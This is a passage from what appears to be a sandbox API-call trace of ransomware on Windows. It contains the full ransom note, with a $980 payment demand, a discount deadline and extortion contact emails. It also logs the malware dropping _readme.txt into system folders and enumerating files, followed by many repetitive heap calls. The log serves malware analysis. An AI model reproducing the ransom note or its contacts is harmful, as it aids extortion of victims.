file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.784] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.784] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.784] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.784] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.784] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.785] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.785] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.785] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.785] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.785] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.790] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.790] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 